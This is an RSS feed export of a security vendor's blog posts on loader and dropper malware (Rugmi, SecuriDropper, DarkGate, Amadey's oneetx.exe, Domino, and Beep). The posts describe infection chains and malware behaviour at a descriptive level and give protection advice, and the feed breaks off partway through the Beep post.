Dropper Archives – Gridinsoft Blog https://gridinsoft.com/blogs/tag/dropper/ Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Thu, 28 Dec 2023 23:34:10 +0000 en-US hourly 1 https://wordpress.org/?v=63247 200474804 Novice Rugmi Loader Delivers Various Spyware https://gridinsoft.com/blogs/rugmi-loader-delivers-spyware/ https://gridinsoft.com/blogs/rugmi-loader-delivers-spyware/#comments Thu, 28 Dec 2023 23:32:44 +0000 https://gridinsoft.com/blogs/?p=18575 The threat landscape meets a new player – Rugmi Loader. This threat specializes in spreading spyware, and is in fact capable of delivering any malware type. Rugmi boasts of its unusual structure, which makes it rather promising among other loaders. What is Rugmi Loader? The Rugmi is a complex loader with multiple components that deliver… Continue reading Novice Rugmi Loader Delivers Various Spyware

The post Novice Rugmi Loader Delivers Various Spyware appeared first on Gridinsoft Blog.

]]>
The threat landscape meets a new player – Rugmi Loader. This threat specializes in spreading spyware, and is in fact capable of delivering any malware type. Rugmi boasts of its unusual structure, which makes it rather promising among other loaders.

What is Rugmi Loader?

The Rugmi is a complex loader with multiple components that deliver information stealers. According to the report, in October and November 2023 alone, Rugmi detections have multiplied. Initially observed with only a few detections, Rugmi has experienced a dramatic increase in activity, with daily detections now numbering in the hundreds. This trend was particularly noticeable in the latter months of 2023.

Rugmi Loader detection trend screenshot
Rugmi Loader detection trend. (source: ESET)

The design of the Rugmi Loader features three components that allow it to unleash its malicious payload. The first component is a downloader tasked with retrieving an encrypted payload. It fetches the necessary malicious software while evading detection through encryption.

The second component is a loader ащк the payload from internal resources. It means that malware can arrive with an embedded payload and run it after all of the initial checks. This internal execution allows the malware to operate seamlessly, integrating into the system’s processes without raising immediate alarms.

Finally, the third component is a loader for external files. It activates the payload from an external file, the one downloaded through the command from the C2. Such a delivery method is more classic, and allows for more steady operations. At the same time, it may be unsuitable for attacks that require rapid action. Conjoining two methods in one is quite a new thing, which will certainly play its party in this malware’s performance.

The primary targets of these campaigns have been identified as the U.S. and Canada, indicating a strategic focus on regions with high-value targets. Such localization coincides with the activity of major spyware families, particularly Vidar, Raccoon and Lumma.

Loader Malware Explained

As the name suggests, loader (or dropper) malware is malicious software designed primarily to download and install other malware onto a compromised system. In short, it acts as a gateway for more malware. Loaders allow gaining access to a system and then fetching other harmful payloads from a remote server. This makes the overall deployment easier, allows weeding out honeypots, and makes the analysis of the entire attack chain more complicated.

The final payloads of loaders could be anything from ransomware and banking trojans to spyware. Its primary purpose is not to cause direct harm but to pave the way for “normal” malware. This road paving also includes changing system properties so there will be much less obstacles for further malware injection.

How dangerous is Rugmi Loader?

There are quite a few loaders in the modern threat landscape, but Rugmi has the merits that can make it competitive, if not prevalent. Currently, this market is dominated by Amadey, which is built around a more straightforward approach. Modularity of Rugmi makes it more potent in all the attack scenarios. At the same time, the rapid growth of a newcomer may motivate old players to evolve, which will spice up the malware world even more.

Nonetheless, all the benefits it brings are more about quantity rather than quality of malware that Rugmi can deploy. Ransomware, spyware, stealers – they develop in their own pace and path, and changes to the delivery methods barely change that. And since the new loader is not something groundbreaking, it is unnecessary to expect huge shifts in the paradigm.

Protect Yourself Against Malware

To safeguard against malware, including sophisticated threats like the Rugmi Loader, follow these essential practices:

  • Be cautious with emails and downloads. We recommend avoiding clicking links or downloading attachments from unknown or suspicious sources. Doing so may put your device and personal information at risk. Phishing emails are a common way to spread malware.
  • Use reputable antivirus software. The anti-malware solution is the first defense line against malware. Please ensure you have a reliable antivirus program installed and keep it updated. These programs can detect and remove many types of malware.
  • Beware of social engineering. With the rise of services like ChatGPT, even the most obtuse scammer can write a convincing, well-crafted email. Be skeptical of unsolicited offers or alarming messages demanding immediate action.
  • Educate yourself. Today, internet scams are progressing too fast. Keeping abreast of current events means knowing how to confront it all. Beware about the latest malware threats and learn to recognize potential risks to ensure your online safety. Forewarned is forearmed.

The post Novice Rugmi Loader Delivers Various Spyware appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/rugmi-loader-delivers-spyware/feed/ 1 18575
SecuriDropper Bypasses Google Play & Android Defenses https://gridinsoft.com/blogs/securidropper-android-google-play/ https://gridinsoft.com/blogs/securidropper-android-google-play/#respond Wed, 08 Nov 2023 22:09:24 +0000 https://gridinsoft.com/blogs/?p=17528 SecuriDropper is a rare example of the Android dropper malware that operates under the dropper-as-a-service (DaaS) model. This malware is raising significant concerns among experts due to its ability to bypass Google’s enhanced security measures and deliver a variety of malicious payloads. What is SecuriDropper Malware? SecuriDropper represents the latest evolution in the ever-changing world… Continue reading SecuriDropper Bypasses Google Play & Android Defenses

The post SecuriDropper Bypasses Google Play & Android Defenses appeared first on Gridinsoft Blog.

]]>
SecuriDropper is a rare example of the Android dropper malware that operates under the dropper-as-a-service (DaaS) model. This malware is raising significant concerns among experts due to its ability to bypass Google’s enhanced security measures and deliver a variety of malicious payloads.

What is SecuriDropper Malware?

SecuriDropper represents the latest evolution in the ever-changing world of cyber threats. It serves as a conduit for cybercriminals to efficiently distribute their malware in a convenient way. This, actually, is a key point of the dropper-as-a-service model. Such innovation enables threat actors to separate the development and execution of an attack from the installation of malware. This trick offers a level of sophistication that is both concerning and challenging to combat.

SECURIDROPPER Process
Two-Stage Infaction Process of SecuriDropper

Dropper malware plays a crucial role in the cybercriminal ecosystem. It acts as a precursor tool designed to provide initial access to the target system. Its primary function is to download and install a malicious payload on the victim’s device, making it a valuable tool for threat actors. This strategic approach allows malicious actors to advertise their services to other criminal groups, creating a lucrative business model.

Distribution of Malicious Payloads

SecuriDropper has been observed distributing a range of malicious payloads, including Android banking trojans such as SpyNote and ERMAC. These trojans are often disguised as legitimate applications and are distributed through deceptive websites and third-party platforms like Discord. The resurgence of Zombinder, another Dropper-as-a-Service tool, has further amplified concerns about the distribution of malware payloads through sideloaded apps.

SecuriDropper is a stark reminder that the fight against cyber threats is an ongoing and evolving battle. As Android continues to implement enhanced security measures, cybercriminals adapt and innovate, finding new ways to infiltrate devices and distribute malware. Dropper-as-a-Service platforms have become powerful tools for malicious actors, posing significant challenges to Android security.

Android 13 Feature Blocks SecuriDropper

Despite quite depressing statements from the above, things are not that bad. Users who got Android 13 updates for their devices are able to counteract SecuriDropper on their own. The new feature called Restricted Settings does what it sounds like to the side-loaded applications.

Restricted Settings Notifications
Restricted Settings Warning Notifications

As the dropper aims at getting excessive permissions, particularly to Accessibility and Notifications, the feature will block such permissions by default. This, however, is an Android 13-only feature, so users of earlier OS versions should be careful when granting permissions.

Folks with the most recent updates should not be reckless either. There is a chance of an infected app in the Google Play Market, which diminishes any anti-side-loaded apps tricks. And since Google hesitates with implementing security features to its official app sources, it remains a source of a threat.

How to Protect Yourself from SecuriDropper

SecuriDropper is a sophisticated Android dropper-as-a-service malware that poses a significant threat to the security of Android devices. To protect yourself from this emerging threat and similar malware, follow these security measures:

  • Only download applications from official app stores like Google Play Store. These platforms implement stringent security measures to ensure the safety of the apps they host.
  • Regularly update your Android device’s operating system and installed applications. Software updates often include security patches that address known vulnerabilities.
  • Install a reputable mobile security solution on your device. These security apps can help detect and remove threats like SecuriDropper from your device.
  • Be cautious when considering sideloaded apps obtained from unofficial sources. While sideloading offers access to a wider range of apps, it also presents security risks. Ensure you trust the source and origin of sideloaded apps.
  • Pay close attention to the permissions requested by apps during installation. Avoid granting unnecessary permissions to apps. For example, if a simple flashlight app requests access to your contacts and camera, it may be suspicious.
  • Regularly backup your important data to a secure location or cloud storage. This ensures you can recover your data in case of a malware infection.

By following these security measures, you can reduce the risk of falling victim to SecuriDropper and other similar threats. Remember that staying vigilant and proactive in protecting your Android device is essential in today’s evolving threat landscape.

The post SecuriDropper Bypasses Google Play & Android Defenses appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/securidropper-android-google-play/feed/ 0 17528
Skype & Microsoft Teams Spam Spreads DarkGate Loader https://gridinsoft.com/blogs/skype-microsoft-teams-spam-darkgate-loader/ https://gridinsoft.com/blogs/skype-microsoft-teams-spam-darkgate-loader/#respond Wed, 25 Oct 2023 10:28:39 +0000 https://gridinsoft.com/blogs/?p=17271 Over the past few years, DarkGate has been relatively inactive. However, several campaign deployments have been detected this year across the Americas, Asia, the Middle East, and Africa. They started to aim at Microsoft apps, such as Skype and Teams, for spreading to target systems. What is DarkGate Loader? DarkGate Loader is a type of… Continue reading Skype & Microsoft Teams Spam Spreads DarkGate Loader

The post Skype & Microsoft Teams Spam Spreads DarkGate Loader appeared first on Gridinsoft Blog.

]]>
Over the past few years, DarkGate has been relatively inactive. However, several campaign deployments have been detected this year across the Americas, Asia, the Middle East, and Africa. They started to aim at Microsoft apps, such as Skype and Teams, for spreading to target systems.

What is DarkGate Loader?

DarkGate Loader is a type of malware that is capable of downloading and running other types of malware, including ransomware, trojans, and cryptocurrency miners. Additionally, it can be used to extract sensitive data from the victim’s computer, such as passwords, credit card numbers, and personal information.

This malware is typically distributed via phishing emails or malicious attachments. Once it is installed on the victim’s computer, it can communicate with a remote command and control (C2) server to receive instructions and download additional malware.

Distribution of DarkGate
Distribution of DarkGate campaign (August -September 2023)

DarkGate Loader has been gaining popularity among cybercriminals since its creator advertised it as a Malware-as-a-Service offering on popular forums in June 2023. Previously, DarkGate Loader was distributed using traditional email-based malspam campaigns, similar to those used by Emotet. However, an operator started using Microsoft Teams to deliver the malware in August via HR-themed social engineering chat messages. This new tactic has led to an increase in the number of DarkGate Loader infections.

DarkGate Spreads Via Microsoft Teams And Skype Spam

A company has been facing a targeted phishing attack since late September. The attackers have been using Microsoft Teams functionality to deliver the DarkGate Loader malware. Fortunately, all the employees were regularly trained to identify phishing attempts, and they promptly intervened. As a result, no employees, customers, or company resources were harmed during this incident. The malicious message was blocked before it could reach any of the employees.

Phishing message
Teams message with a malicious attachment

After analyzing a recent case, we discovered that the DarkGate Loader malware was delivered in the payload of a ZIP archive. The image below illustrates the entire attack process, from the moment the Microsoft Teams message is sent to the execution of the DarkGate Loader:

Microsoft Teams Attack chain

In the next sample, the threat actor exploited a trusted relationship between two organizations to trick the recipient into running the attached VBA script. By gaining access to the victim’s Skype account, the attacker could take control of an existing messaging thread and create file names related to the chat history’s context.

DarkGate chain
DarkGate infection chain abusing Skype

The victims were sent a message from a compromised Skype account. The message contained a deceptive VBS script with a file name that followed the format: “ www.skype[.]vbs“. The spacing in the file name was deliberately designed to trick the user into thinking that the file was a .PDF document while actually hiding the real format, which was www.skype[.]vbs. In this sample, the recipient believed that the sender was someone from a trusted external supplier.

Installation Consequences

Experts noticed that the threat was functioning as a downloader of further payloads. Once the DarkGate malware was installed, it deposited files in both the <С:/Intel/> and <%appdata%/Adobe/> directories, which aided in its attempt to disguise itself.

The dropped files were identified as variations of either DarkGate or Remcos, most likely to enhance the attackers’ hold on the infected system. Below are some of the sample file names we came across for these additional payloads:

  • Folkevognsrugbrd.exe
  • logbackup_0.exe
  • sdvbs.exe
  • Vaabenstyringssystem.exe
  • Sdvaners.exe
  • Dropper.exe

How to protect against DarkDate Loader?

DarkGate Loader is a dangerous malware that can be used to steal sensitive data from your computer and install other malware, such as ransomware and trojans. Whether you are an individual or an organization, it is important to be aware of the risks posed by DarkGate Loader and to take steps to protect yourself.
To protect you and your organization against DarkGate Loader, you can take the following steps:

  • Using a reliable password manager to create and store strong, individual passwords for all your accounts is crucial. Strong passwords are complex to guess and can protect your accounts from brute force attacks.
  • Implement a web content filtering solution to block malicious websites. A web content filter prevents access to known malware and phishing sites.
  • Deploy a next-generation firewall (NGFW) to protect your network from malicious traffic. An NGFW can help to detect and block malware, phishing emails, and other types of cyberattacks.
  • Only download software and files from reputable sources. Avoid downloading files from suspicious websites or using unofficial app stores.
  • Use EDR/XDR to provide real-time monitoring, threat detection, and incident response capabilities across your network and endpoints. These tools can identify unusual or suspicious activities that could indicate loader malware.

The post Skype & Microsoft Teams Spam Spreads DarkGate Loader appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/skype-microsoft-teams-spam-darkgate-loader/feed/ 0 17271
DarkGate Loader Expands Activity, Delivers Ransomware https://gridinsoft.com/blogs/darkgate-loader-delivers-ransomware/ https://gridinsoft.com/blogs/darkgate-loader-delivers-ransomware/#respond Mon, 04 Sep 2023 08:35:39 +0000 https://gridinsoft.com/blogs/?p=16675 A new DarkGate malware deployment campaign has caught the attention of cybersecurity researchers. This was fueled by the developer’s decision to lease its product to a limited number of affiliates. DarkGate Malware Activity Spikes as Developer Rents Out It According to cybersecurity researchers, a new DarkGate malware campaign made a fuss. It spreads through phishing… Continue reading DarkGate Loader Expands Activity, Delivers Ransomware

The post DarkGate Loader Expands Activity, Delivers Ransomware appeared first on Gridinsoft Blog.

]]>
A new DarkGate malware deployment campaign has caught the attention of cybersecurity researchers. This was fueled by the developer’s decision to lease its product to a limited number of affiliates.

DarkGate Malware Activity Spikes as Developer Rents Out It

According to cybersecurity researchers, a new DarkGate malware campaign made a fuss. It spreads through phishing emails and uses stolen email threads to trick users into clicking on a hyperlink that downloads the malware. Initial analysis indicates that this malware sample is very similar to the DarkGate malware. The initial infection routine and observed C2 communication protocol were nearly identical to past analyses of the same malware family. However, further research has confirmed that this sample is part of the DarkGate malware family, based on embedded strings and functionality. In addition, the recent surge in DarkGate malware activity is likely because the developer has rented out the malware to a few affiliates.

DarkGate Loader Details

DarkGate is malware sold primarily on underground forums by an user nicknamed RastaFarEye. This malware is designed to avoid detection by security software, and it can establish persistence through Windows Registry modifications to gain elevated privileges. As for damage – it steals data from web browsers, Discord, FileZilla, and other software and connects to a command-and-control (C2) server to perform tasks. Moreover, the task may include file enumeration, data exfiltration, launching cryptocurrency miners, capturing screenshots remotely, and executing other commands.

Spreading

Traditionally, phishing attacks have been the primary delivery route for malware; this case is no exception. In addition, according to some reports, 79% of malware in Q2 2023 was delivered via phishing emails. However, specialists have identified two explicit DarkGate contamination scenarios. The first method involves using an infection pattern wherein an MSI installer file is the initial payload. Thus, victims of this infection receive this file by clicking on a link included in a phishing message. This link leads to a traffic distribution system (TDS). As a result, it redirects the victim to the final payload URL for the MSI download if the attacker’s requirements are met. Upon opening the downloaded MSI file, the DarkGate infection is triggered.

Spreading the DarkGate loader through phishing emails image
Spreading the DarkGate loader through phishing emails

In addition, experts have discovered samples of another campaign with a Visual Basic script to deliver the initial payload. However, experts do not precisely understand how the initial load is delivered to the victim. The script is obfuscated and contains decoy/junk code. Later, it invokes the curl binary that comes pre-installed with Windows to download the AutoIt executable and script file from a server controlled by the attacker. After that, the infection chain follows the previously described campaign.

Distributing DarkGate loader via Visual Basic script image
Distributing DarkGate loader via Visual Basic script

Key Action of DarkGate Loader

DarkGate is a modular loader that can deliver a variety of payloads, including ransomware, botnets, trojans, keyloggers, spyware, and dll files. In other words, DarkGate Loader is a versatile and dangerous malware that can be used to deliver a variety of payloads. The loader waits for commands from the command server. When C2 sends a message containing the IP address of a secondary server, DarkGate can get the payload.

The malware uses DLL file format to run stealthily by loading the library to the memory using the system process called rundll32.exe or injecting it into an application with a bad to no DLL checkup. As a result, the malware steals confidential data such as passwords and cookies from the victim’s system. It targets web browsers, email software, and applications like Discord or FileZilla. The malware uses legitimate freeware tools published by Nirsoft to extract information, and it can access the operating system, the logged-on user, the currently running programs, and other data sources. This information is sent to the C2 server and is available in the threat actor’s panel. Additionally, the malware can collect arbitrary files from the victim system when requested through the C2 channel.

Defense evasion

After initialization, the malware proceeds to a function identified as the “C2 main loop.” In this loop, the malware periodically checks the C2 server for new instructions, executes the received commands, and sends back the results to the C2 server. The C2 main loop contains over 100 orders, including information gathering, self-management, self-update, stealer, crypto miner, RAT, and file management. The malware contains multiple functions to evade typical analysis tools. If the corresponding features are enabled, and the sample detects an environment that matches one of the checks, it will terminate the process. Moreover, the malware looks for multiple well-known AV products and may alter its behavior depending on the result. The discovered AV product is communicated back to the C2 server. The malware may also masquerade its presence and inject itself into legitimate Windows processes based on the used configuration.

Malware As a Service

Initially, the malware was only used privately by the developer. But now, malware authors offer it as a subscription service, with prices ranging from $1,000 per day to $15,000 per month to $100,000 per year. Moreover, the author claims that the malware is the “ultimate tool for pentesters/redteamers” and boasts of “features that you won’t find anywhere.” By the way, earlier versions of DarkGate also included a ransomware module. In any case, introducing the MaaS program will likely increase DarkGate malware campaigns, making it an ongoing threat in the future.

How to protect against DarkGate Loader?

Here are some tips on how to protect against DarkGate Loader:

  • Keep your software up to date. Software updates often include security patches that can help protect your devices from malware.
  • Be careful about what websites you visit and what links you click on. Malware, like DarkGate Loader, can spread through malicious websites and links.
  • Use a firewall to block unauthorized access to your devices. This can help prevent DarkGate Loader from infecting your devices.
  • Back up your data regularly. This way, if your devices are infected with DarkGate Loader, you can always restore your data from a backup.
  • Use a strong password manager to create and store strong passwords for your online accounts.
  • Enable two-factor authentication (2FA) for your online accounts. This will add an extra layer of security to your accounts.
  • Use an anti-malware solution with up-to-date signatures. It will help detect and remove DarkGate Loader if it does manage to infect your device.

DarkGate Loader Expands Activity, Delivers Ransomware

The post DarkGate Loader Expands Activity, Delivers Ransomware appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/darkgate-loader-delivers-ransomware/feed/ 0 16675
Oneetx.exe – What is that process? Oneetx Removal https://gridinsoft.com/blogs/oneetx-removal/ https://gridinsoft.com/blogs/oneetx-removal/#respond Mon, 22 May 2023 15:56:39 +0000 https://gridinsoft.com/blogs/?p=14627 Oneetx.exe is a malicious process, related to Amadey dropper malware. It can be spectated in the Task Manager, with seemingly nothing suspicious about it – if you don’t know what it stands for. Let me show you how it appears and how you can remove it. What is Oneetx.exe process? Oneetx.exe is a disguised name… Continue reading Oneetx.exe – What is that process? Oneetx Removal

The post Oneetx.exe – What is that process? Oneetx Removal appeared first on Gridinsoft Blog.

]]>
Oneetx.exe is a malicious process, related to Amadey dropper malware. It can be spectated in the Task Manager, with seemingly nothing suspicious about it – if you don’t know what it stands for. Let me show you how it appears and how you can remove it.

What is Oneetx.exe process?

Oneetx.exe is a disguised name chosen by Amadey dropper developers to hide their malware among other processes. Windows tracks all processes running in the system and displays what it found in Task Manager. Obviously, obfuscated names like sv39103.exe will attract attention and raise suspicion. That is the reason why hackers opt for some ordinary names. Their often choice is system processes or ones related to popular software packages, like Photoshop or crypto mining software. This case, however, is different.

Oneetx.exe process
Oneetx.exe process in Task Manager

It appears that oneetx.exe does not belong to any program. Moreover, Google contains clear clues that this process belongs to malware that has acted as a backbone of the Russian botnet since 2018. The most obvious guess is, of course, Emotet malware. It is known for having possibly the most extensive networks on the planet. However, in this case, the short research showed the relation of oneetx.exe to the Amadey dropper.

What is Amadey?

Amadey is a dropper (a.k.a downloader) malware, that has only one purpose – deliver other malware to the infected system. It often acts as a precursor, that makes sure the system is not in a banned region and is not a debug environment. It can deliver a wide range of threats – from the aforementioned Emotet to RedLine stealer and even STOP/Djvu ransomware. Even after delivering the payload, it remains active, waiting for other commands from hackers.

Aimed at long-term stay in the system, Amadey does its best in hiding from users and anti-malware software. Choosing an unremarkable name is only a small part of the way it disguises itself. First of all, each of its samples is repacked in a specific way, making it harder for antiviruses to detect. Amadey typically arrives within phishing emails with attached Office documents. Upon execution, malware moves its files from the original directory to the other folder, depending on the antivirus software present in the system. All these actions make it a pretty tough nut for “classic” antiviruses.

IoC Amadey Dropper

How to remove Oneetx.exe?

You will likely fail to remove Oneetx.exe from your system manually. It performs a row of actions for persistence provision, which forces the user to locate and remove all the changes it does to the system before touching the files. For that reason, I’d recommend using GridinSoft Anti-Malware – a program that specialises in removing threats like Amadey dropper.

Oneetx.exe &#8211; What is that process? Oneetx Removal

The program will not only help you with removing this malware, but also prevent any further infections. Its detection system makes it effective even against the newest tricks – regardless of the way they’re packed. However, anti-malware software should be your last line of defense. To stay secure, it is better to avoid any muddy waters at all. In the case of Amadey malware, the key is to be vigilant when you deal with email messages. Read our detailed analysis of modern spam emails and the way to recognise them.

The post Oneetx.exe – What is that process? Oneetx Removal appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/oneetx-removal/feed/ 0 14627
Domino Backdoor is Lead by FIN7 and Conti Actors https://gridinsoft.com/blogs/domino-backdoor/ https://gridinsoft.com/blogs/domino-backdoor/#comments Sat, 15 Apr 2023 22:13:57 +0000 https://gridinsoft.com/blogs/?p=14218 A new Domino Backdoor popped out at the beginning of 2023. Since February, a new malware family coined Domino is used for attack on corporations, having Project Nemesis stealer as a final payload. Analysts say that the new backdoor is controlled and developed by ex-TrickBot/Conti actors and hackers related to the FIN7 group. Who are… Continue reading Domino Backdoor is Lead by FIN7 and Conti Actors

The post Domino Backdoor is Lead by FIN7 and Conti Actors appeared first on Gridinsoft Blog.

]]>
A new Domino Backdoor popped out at the beginning of 2023. Since February, a new malware family coined Domino is used for attack on corporations, having Project Nemesis stealer as a final payload. Analysts say that the new backdoor is controlled and developed by ex-TrickBot/Conti actors and hackers related to the FIN7 group.

Who are Conti and FIN7?

First of all, let’s explain why the presence of actors from FIN7 and the ceased Conti gang is so noteworthy. FIN7 is a cybercrime gang that likely operates from Russia and Ukraine. It is also known under the names of Carbanak (after the backdoor they use), ITG14 and ALPHV/BlackCat. They are most notorious for collaborations with widely-known threat actors, like Ruyk and REvil ransomware, and the release of their own ransomware, called ALPHV. It is still running, and had a couple of noteworthy attacks the past year.

ALPHV onionsite
ALPHV onionsite. Gang uses it to publish data leaked from victims that refused to pay the ransom

Conti is a similar and different story simultaneously. They have built their image around an eponymous ransomware sample. Same as FIN7, this group of cybercriminals consists of actors from ex-USSR countries. However, the start of the war in February 2022 led to a quarrel among the group’s top-management and further publication of its source code. That, eventually, led to the group’s dissolution. Previous to these events, Conti was a prolific ransomware gang with a major share on the market.

Their collaboration is an expected thing. Nature abhors a vacuum, so after the gang breakup its members promptly joined other groups, or started new ones. However, the collaboration with other gangs on the creation of brand-new malware is a pretty outstanding case. That may be a great start of a new character on the scene, a new threat actor, or just a powerful boost to the FIN7 gang.

Domino Backdoor Description

Domino is a classic example of a modern backdoor that is capable of malware delivery. It is noticed for spreading a separate malware dropper, coined Domino Loader. The former provides only remote access to the targeted system, while the latter serves for malware deployment. This duo is spotted for being used in a pretty unique multi-step malware spreading campaign.

Domino multi-stage attack

Dave Loader is a classic dropper malware example – the one which serves only to deliver other malware. Its presence in this scheme, however, gives an interesting clue about the possible relations between Domino and Conti ransomware gang. The infection proceeds with the delivery of Domino backdoor and, in a quick succession, its dropper module. Then, at the final stage, Domino drops a Project Nemesis stealer. The latter aims generally at credentials from social networks, VPN clients and cryptocurrency services.

Why, Exactly, a Collaboration?

The key things that point to the fact that Domino backdoor is a collaboration rather than a stand-alone development is the use of Dave Loader as a delivery way, and sharing certain code elements with FIN7’s brainchild Lizar Malware. Dave is an internal product of Conti gang, used exclusively in its cyberattacks. It never leaked, contrary to the Conti ransomware code, thus there’s no way that a third party uses it. Lizar Loader a.k.a Tirion/DiceLoader, on the other hand, is an auxiliary malware used by FIN7. Domino malware shares major parts of code with this loader, including bot ID generation and data package encryption mechanisms. Moreover, the IPs range where Domino’s command servers are hosted is pretty close to the one FIN7 uses for their C2s; both ranges belong to MivoCloud hosting.

Domino Backdoor & Loader Analysis

Analysts from IBM Security Intelligence already got their hands on Domino samples, both backdoor and dropper. First things first – so let’s start from a backdoor.

Domino Backdoor

It arrives to the infected system as a C++ 64-bit DLL file. The form of DLL file makes it easier for crooks to perform a stealth execution. Droppers Domino generally rely on running it using the shellcode embedded into the payload retrieved from the command server. Once executed, Domino starts hashing the system data in order to generate a bot ID value. Primarily, it looks for username and system name; additionally, malware takes its process ID and adds it to the hash. Its final form looks like a648628c13d928dc-3250.

Hashing proceeds with further decryption of the Domino’s code. It carries an XOR-encrypted code in a data section of its binary; the 16-bit decryption XOR key is placed right before this section. This part contains not only further execution instructions, but also C2 communication data.

Domino C2 communication
Code responsible for correct command handling

C2 Communications

To secure the data transfer, it generates a 32-bit key and uses an embedded RSA public key to encrypt it. This, however, is used only for an initial connection. After that, malware continues with collecting information about the system. For further C2 connections, the malware uses the AES-256-CBC key, which also comes into the initial package. Same as in the first case, Domino generates a public key on the run and uses it to cipher the data package.

It is also interesting how Domino backdoor picks the C2 address it will use as primary. By design, there are only two C2 addresses in the malware configuration section. If the parent system for the malware belongs to a domain (i.e. LAN or WAN), it uses the second IP as a primary. When the computer is stand-alone, Domino chooses the first one.

To guide the malware, C2 sends it a set of commands and a payload. Same as data that goes from the client, they are encrypted. Commands instruct not only about the action, but also about the preferred way to run the payload. The set of commands is like the following:

Command Explanation
0x1 Copy the payload in the allocated memory. The instructions about allocation are retrieved in 0x5/0x6 commands.
0x3 quit execution
0x4 save the retrieved payload to the %Temp% folder. The name for the file is generated with GetTempFileNameA and CreateProcessA functions
0x5, 0x6 Instructs malware about allocating the memory for further payload deployment in a certain process.
0x7 Asks malware to enumerate the processes and send the output to the server. Precedes the 0x5/0x6, as it supplies the C2 with info about possible processes to use for injection.

Domino Loader

Domino Loader resembles the Domino Backdoor in many ways, so the naming convention there is quite obvious. This malware uses the same methods of C2 requests encryption. However, the amount of data gathered about the system is way less; its capabilities are concentrated around retrieving and running the payload’s DLL. It uses an infamous ReflectiveDLLInjection project – a concept of DLL injection technique. This, however, is not the only possible way of the Loader operations – it can change its behaviour depending on the command from the C2 that comes as a supplementary to a payload. It most definitely depends on the form the payload arrives in.

The commands convention is pretty much the same as in the Domino Backdoor. A single-byte blob that precedes the payload indicates what exactly the malware should do. Aside from that, the payload is succeeded with a value that notifies malware about the preferred method of loading. If the value is >0, malware allocates memory within the process it runs in, and runs the DLL payload at the offset that equals the value. That method, actually, requires the aforementioned ReflectiveDLLInjection technique.

Value 0 corresponds to running the payload as a .NET assembly. This supposes calling for VirtualAlloc for memory allocation, and a PAGE_EXECUTE_READWRITE for securing this area. Assembly.Load function finishes the job by making the payload run.

Once the value is -1, Domino Loader runs a PE loading procedure. First, it allocates memory in its current process – same as in the case of DLL loading. Then, however, it copies the headers and sections to the newly allocated memory area, loads the imports of the PE file, and finally runs it. In this case, malware applies the offsets present within the payload PE sections.

Protection against Domino Backdoor/Domino Loader

This malware is rare enough, so it is quite hard to judge on its counteraction ways. Nonetheless, they are definitely needed, as it promises to be pretty dangerous. First and foremost sources of such instructions – spreading ways – are unclear. It may possibly become more obvious in future when Domino will see more popularity. Thus now only common steps may have significant efficiency.

Use a security solution that features a zero-trust protection policy. Only having no trusted programs at all you can be sure that your security tool will not miss a new cunning malware that hides behind a benign program. Zero-trust has its downsides, but they’re much less critical than a paralysed workflow after a ransomware attack.

Improve your network security. This is Domino-specific advice, as this malware features a pretty limited list of only two C2 servers. It may be changed in future, but currently it is not a big deal to block them. This, however, will be much easier to accomplish by having a Network Detection and Response solution. It automatically weeds out potentially malicious requests, and also offers a lot of analytics information. Stopping malware from contacting the C2 makes it useless, as it cannot deliver payloads and do other unpleasant things.

The post Domino Backdoor is Lead by FIN7 and Conti Actors appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/domino-backdoor/feed/ 1 14218
New stealthy “Beep” malware focuses heavily on evading detection https://gridinsoft.com/blogs/beep-malware-detection-evasion/ https://gridinsoft.com/blogs/beep-malware-detection-evasion/#respond Fri, 03 Mar 2023 10:26:15 +0000 https://gridinsoft.com/blogs/?p=13566 Cybercriminals periodically develop something new. Sometimes it is an updated version of already known malware, and sometimes it is something new and not obvious, such as Beep malware. Thus, this malware has one distinguishing feature: a new tactic of evading detection. Although Beep malware is still under development, it already boasts existing functionality that avoids… Continue reading New stealthy “Beep” malware focuses heavily on evading detection

The post New stealthy “Beep” malware focuses heavily on evading detection appeared first on Gridinsoft Blog.

]]>
Cybercriminals periodically develop something new. Sometimes it is an updated version of already known malware, and sometimes it is something new and not obvious, such as Beep malware. Thus, this malware has one distinguishing feature: a new tactic of evading detection. Although Beep malware is still under development, it already boasts existing functionality that avoids being analyzed and detected by security software.

What kind of malware is Beep?

Not so long ago, Minerva cybersecurity researchers discovered a very interesting malware with an equally exciting name, “Beep”. Beep Malware is a new stealth virus with several features designed to steal sensitive information and create a chain of infections. The latter involves downloading/installing additional malware or components. Consequently, it can infect devices with Trojans, ransomware, cryptocurrency miners, or other malware.
There is speculation that Beep is delivered via a spam email attachment, Discord, or OneDrive URL. It is also mentioned to be a “malware-as-a-service” i.e. it offers other criminals to spread their payloads within the botnet infected by the Beep . It consists of three components: a dropper, an injector, and a payload.

Beep Virustotal
Beep malware page on VirusTotal

Dropper

The dropper starts its work after some anti-debugging and anti-VM checks. Then it creates a new registry section with the value “AphroniaHaimavati” and a base64-encoded PowerShell script. It then adds a scheduled task every 13 minutes and executes the PowerShell script stored in the registry. Before running, the script loads the data and stores it in an injector called AphroniaHaimavati.dll.

Injector

The injector is a component that uses several debugging and virtual machine protection techniques to inject a payload into a legitimate system process, for example, “WWAHost.exe”. This is achieved by cleaning the process and is done to avoid detection by antivirus tools.

Payload

The primary payload tries to collect the needed data from the compromised machine. It then encrypts them and tries to send them to C2, which has been hard-coded. Although C2’s hard-coded address was disabled during the analysis, the malware tried connecting even after 120 failed attempts.

Despite the limitations of malware analysis, experts were still able to detect the following functions in the sample, which are triggered by C2 commands:

  • dll (executes a dll file)
  • exe (runs an.exe file)
  • shellcode (executes further shellcode)
  • screenshot (a task that seems to collect the process list)
  • additional (gathers more data)
  • knock timeout (modifies “Keep-alive” intervals for C&C)

Moreover, it has at least four functions that were not used during the test: destroy, init, task, and balancer. This, however, does not make it less dangerous.

Evading detection methods

Let’s look at what the Beep malware highlights: the detection evasion techniques it uses throughout the execution process. Once analysts dug deeper into this sample, they noticed the use of many evasion techniques. This gave the impression that the authors of the Beep malware were trying to implement as many anti-debugging and anti-VM (anti-sandbox) techniques as possible. For example, one method was to delay execution using the Beep API, hence the malware’s name.

Anti-analysis features in Beep malware:

